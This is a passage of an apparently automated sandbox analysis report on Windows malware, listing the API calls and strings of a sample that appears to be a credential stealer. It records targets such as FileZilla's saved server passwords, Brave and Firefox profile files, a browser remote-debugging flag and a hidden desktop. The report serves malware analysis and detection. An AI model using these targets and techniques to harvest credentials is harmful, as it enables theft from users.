                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3CE8
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C3CF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3D1A
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C3D47
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C3D52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3D79
                                • lstrlen.KERNEL32(009E1794), ref: 009C3D8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3DAD
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C3DB9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3DE2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3E11
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C3E1C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3E43
                                • lstrlen.KERNEL32(009E1794), ref: 009C3E55
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3E77
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C3E83
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3EAC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3EDB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C3EE6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3F0D
                                • lstrlen.KERNEL32(009E1794), ref: 009C3F1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3F41
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C3F4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3F75
                                • lstrlen.KERNEL32(?), ref: 009C3F89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3FA9
                                • lstrcat.KERNEL32(00000000,?), ref: 009C3FB7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C3FE0
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C401F
                                • lstrlen.KERNEL32(010CD280), ref: 009C402E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4056
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C4061
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C408A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C40CE
                                • lstrcat.KERNEL32(00000000), ref: 009C40DB
                                • FindNextFileA.KERNEL32(00000000,?), ref: 009C42D9
                                • FindClose.KERNEL32(00000000), ref: 009C42E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 1006159827-1013718255
                                • Opcode ID: b9a8429a57b01dd32a5e73877c09598e292e316a638881d0b92054484e93319b
                                • Instruction ID: 03afabfc1b3b9d88ad2fb0c197aab9584b9745d2ff97ff2781acdd1a0395bbed
                                • Opcode Fuzzy Hash: b9a8429a57b01dd32a5e73877c09598e292e316a638881d0b92054484e93319b
                                • Instruction Fuzzy Hash: 81627D31D11616ABDB21EFA4DE89FEE77B9EF84700F048128B805A7251DB34DE05CB92
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C6995
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 009C69C8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6A29
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C6A34
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6A5D
                                • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 009C6A77
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6A99
                                • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 009C6AA5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6AD0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6B00
                                • LocalAlloc.KERNEL32(00000040,?), ref: 009C6B35
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C6B9D
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C6BCD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 313953988-555421843
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BDBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BDBEF
                                • lstrlen.KERNEL32(009E4CA8), ref: 009BDBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDC17
                                • lstrcat.KERNEL32(00000000,009E4CA8), ref: 009BDC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDC4C
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BDC8F
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BDCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 009BDCD0
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009BDCF0
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009BDD0A
                                • lstrlen.KERNEL32(009DCFEC), ref: 009BDD1D
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BDD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BDD7B
                                • lstrlen.KERNEL32(009E1794), ref: 009BDD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDDA3
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009BDDAF
                                • lstrlen.KERNEL32(?), ref: 009BDDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 009BDDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDE19
                                • lstrlen.KERNEL32(009E1794), ref: 009BDE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BDE6F
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009BDE7B
                                • lstrlen.KERNEL32(010C8B78), ref: 009BDE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BDEBB
                                • lstrlen.KERNEL32(009E1794), ref: 009BDEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BDEE6
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009BDEF2
                                • lstrlen.KERNEL32(010C8998), ref: 009BDF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BDF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDFA5
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009BDFB1
                                • lstrlen.KERNEL32(010C8B78), ref: 009BDFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BDFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BDFF4
                                • lstrlen.KERNEL32(009E1794), ref: 009BDFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE022
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009BE02E
                                • lstrlen.KERNEL32(010C8998), ref: 009BE03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009BE06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 009BE0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 009BE0E7
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BE11F
                                • lstrlen.KERNEL32(010CD280), ref: 009BE12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE155
                                • lstrcat.KERNEL32(00000000,?), ref: 009BE15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE19F
                                • lstrcat.KERNEL32(00000000), ref: 009BE1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009BE1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 009BE1F9
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009BE22F
                                • lstrlen.KERNEL32(010C88C8), ref: 009BE23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 009BE261
                                • lstrcat.KERNEL32(00000000,010C88C8), ref: 009BE269
                                • FindNextFileA.KERNEL32(00000000,?), ref: 009BE988
                                • FindClose.KERNEL32(00000000), ref: 009BE997
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                • String ID: Brave$Preferences$\Brave\Preferences
                                • API String ID: 1346089424-1230934161
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B60FF
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B6152
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B6185
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B61B5
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B61F0
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B6223
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009B6233
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C6B9D
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C6BCD
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C6BFD
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C6C2F
                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 009C6C3C
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009C6C43
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 009C6C5A
                                • lstrlen.KERNEL32(00000000), ref: 009C6C65
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6CA8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6CCF
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 009C6CE2
                                • lstrlen.KERNEL32(00000000), ref: 009C6CED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6D30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6D57
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 009C6D6A
                                • lstrlen.KERNEL32(00000000), ref: 009C6D75
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6DB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6DDF
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 009C6DF2
                                • lstrlen.KERNEL32(00000000), ref: 009C6E01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6E49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6E71
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 009C6E94
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 009C6EA8
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 009C6EC9
                                • LocalFree.KERNEL32(00000000), ref: 009C6ED4
                                • lstrlen.KERNEL32(?), ref: 009C6F6E
                                • lstrlen.KERNEL32(?), ref: 009C6F81
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 2641759534-2314656281
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C4B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C4B7F
                                • lstrlen.KERNEL32(009E4CA8), ref: 009C4B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4BA7
                                • lstrcat.KERNEL32(00000000,009E4CA8), ref: 009C4BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 009C4BFA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: prefs.js
                                • API String ID: 2567437900-3783873740
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C1291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C12B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C12BF
                                • lstrlen.KERNEL32(009E4CA8), ref: 009C12CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C12E7
                                • lstrcat.KERNEL32(00000000,009E4CA8), ref: 009C12F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 009C133A
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009C135C
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009C1376
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C13AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C13D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C13E2
                                • lstrlen.KERNEL32(009E1794), ref: 009C13ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C140A
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C1416
                                • lstrlen.KERNEL32(?), ref: 009C1423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1443
                                • lstrcat.KERNEL32(00000000,?), ref: 009C1451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C147A
                                • StrCmpCA.SHLWAPI(?,010CD190), ref: 009C14A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C14E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1535
                                • StrCmpCA.SHLWAPI(?,010CDBF0), ref: 009C1552
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C1593
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C15BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C15E4
                                • StrCmpCA.SHLWAPI(?,010CD2F8), ref: 009C1602
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1633
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C165C
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C1685
                                • StrCmpCA.SHLWAPI(?,010CD400), ref: 009C16B3
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C16F4
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C171D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C1745
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C1796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C17BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C17F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 009C181C
                                • FindClose.KERNEL32(00000000), ref: 009C182B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                APIs
                                • wsprintfA.USER32 ref: 009CCBFC
                                • FindFirstFileA.KERNEL32(?,?), ref: 009CCC13
                                • lstrcat.KERNEL32(?,?), ref: 009CCC5F
                                • StrCmpCA.SHLWAPI(?,009E17A0), ref: 009CCC71
                                • StrCmpCA.SHLWAPI(?,009E17A4), ref: 009CCC8B
                                • wsprintfA.USER32 ref: 009CCCB0
                                • PathMatchSpecA.SHLWAPI(?,010C89A8), ref: 009CCCE2
                                • CoInitialize.OLE32(00000000), ref: 009CCCEE
                                  • Part of subcall function 009CCAE0: CoCreateInstance.COMBASE(009DB110,00000000,00000001,009DB100,?), ref: 009CCB06
                                  • Part of subcall function 009CCAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 009CCB46
                                  • Part of subcall function 009CCAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 009CCBC9
                                • CoUninitialize.COMBASE ref: 009CCD09
                                • lstrcat.KERNEL32(?,?), ref: 009CCD2E
                                • lstrlen.KERNEL32(?), ref: 009CCD3B
                                • StrCmpCA.SHLWAPI(?,009DCFEC), ref: 009CCD55
                                • wsprintfA.USER32 ref: 009CCD7D
                                • wsprintfA.USER32 ref: 009CCD9C
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 009CCDB0
                                • wsprintfA.USER32 ref: 009CCDD8
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 009CCDF1
                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 009CCE10
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 009CCE28
                                • CloseHandle.KERNEL32(00000000), ref: 009CCE33
                                • CloseHandle.KERNEL32(00000000), ref: 009CCE3F
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009CCE54
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CCE94
                                • FindNextFileA.KERNEL32(?,?), ref: 009CCF8D
                                • FindClose.KERNEL32(?), ref: 009CCF9F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 3860919712-2388001722
                                • Opcode ID: 40c1f19b7638cdbb10dc173ee8449f5419502fed4360a8096b3476ae78c4fd57
                                • Instruction ID: b9d9fcebda0646e6d0ecfc39fd82ae52cd2584743b6881dcbe399e65148b037f
                                • Opcode Fuzzy Hash: 40c1f19b7638cdbb10dc173ee8449f5419502fed4360a8096b3476ae78c4fd57
                                • Instruction Fuzzy Hash: 67C160B1900259AFDB60DF64DD85FEE7779EF88300F044599F50AA7281DE34AE44CBA1
                                APIs
                                • memset.MSVCRT ref: 009B9790
                                • lstrcat.KERNEL32(?,?), ref: 009B97A0
                                • lstrcat.KERNEL32(?,?), ref: 009B97B1
                                • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 009B97C3
                                • memset.MSVCRT ref: 009B97D7
                                  • Part of subcall function 009D3E70: lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D3EA5
                                  • Part of subcall function 009D3E70: lstrcpy.KERNEL32(00000000,010CE6C8), ref: 009D3ECF
                                  • Part of subcall function 009D3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,009B134E,?,0000001A), ref: 009D3ED9
                                • wsprintfA.USER32 ref: 009B9806
                                • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 009B9827
                                • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 009B9844
                                  • Part of subcall function 009D46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009D46B9
                                  • Part of subcall function 009D46A0: Process32First.KERNEL32(00000000,00000128), ref: 009D46C9
                                  • Part of subcall function 009D46A0: Process32Next.KERNEL32(00000000,00000128), ref: 009D46DB
                                  • Part of subcall function 009D46A0: StrCmpCA.SHLWAPI(?,?), ref: 009D46ED
                                  • Part of subcall function 009D46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 009D4702
                                  • Part of subcall function 009D46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 009D4711
                                  • Part of subcall function 009D46A0: CloseHandle.KERNEL32(00000000), ref: 009D4718
                                  • Part of subcall function 009D46A0: Process32Next.KERNEL32(00000000,00000128), ref: 009D4726
                                  • Part of subcall function 009D46A0: CloseHandle.KERNEL32(00000000), ref: 009D4731
                                • memset.MSVCRT ref: 009B9862
                                • lstrcat.KERNEL32(00000000,?), ref: 009B9878
                                • lstrcat.KERNEL32(00000000,?), ref: 009B9889
                                • lstrcat.KERNEL32(00000000,009E4B60), ref: 009B989B
                                • memset.MSVCRT ref: 009B98AF
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 009B98D4
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B9903
                                • StrStrA.SHLWAPI(00000000,010CEC90), ref: 009B9919
                                • lstrcpyn.KERNEL32(00BE93D0,00000000,00000000), ref: 009B9938
                                • lstrlen.KERNEL32(?), ref: 009B994B
                                • wsprintfA.USER32 ref: 009B995B
                                • lstrcpy.KERNEL32(?,00000000), ref: 009B9971
                                • memset.MSVCRT ref: 009B9986
                                • Sleep.KERNEL32(00001388), ref: 009B99E7
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B1557
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B1579
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B159B
                                  • Part of subcall function 009B1530: lstrcpy.KERNEL32(00000000,?), ref: 009B15FF
                                  • Part of subcall function 009B92B0: strlen.MSVCRT ref: 009B92E1
                                  • Part of subcall function 009B92B0: strlen.MSVCRT ref: 009B92FA
                                  • Part of subcall function 009B92B0: strlen.MSVCRT ref: 009B9399
                                  • Part of subcall function 009B92B0: strlen.MSVCRT ref: 009B93E6
                                  • Part of subcall function 009D4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 009D4759
                                  • Part of subcall function 009D4740: Process32First.KERNEL32(00000000,00000128), ref: 009D4769
                                  • Part of subcall function 009D4740: Process32Next.KERNEL32(00000000,00000128), ref: 009D477B
                                  • Part of subcall function 009D4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 009D479C
                                  • Part of subcall function 009D4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 009D47AB
                                  • Part of subcall function 009D4740: CloseHandle.KERNEL32(00000000), ref: 009D47B2
                                  • Part of subcall function 009D4740: Process32Next.KERNEL32(00000000,00000128), ref: 009D47C0
                                  • Part of subcall function 009D4740: CloseHandle.KERNEL32(00000000), ref: 009D47CB
                                • CloseDesktop.USER32(?), ref: 009B9A1C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
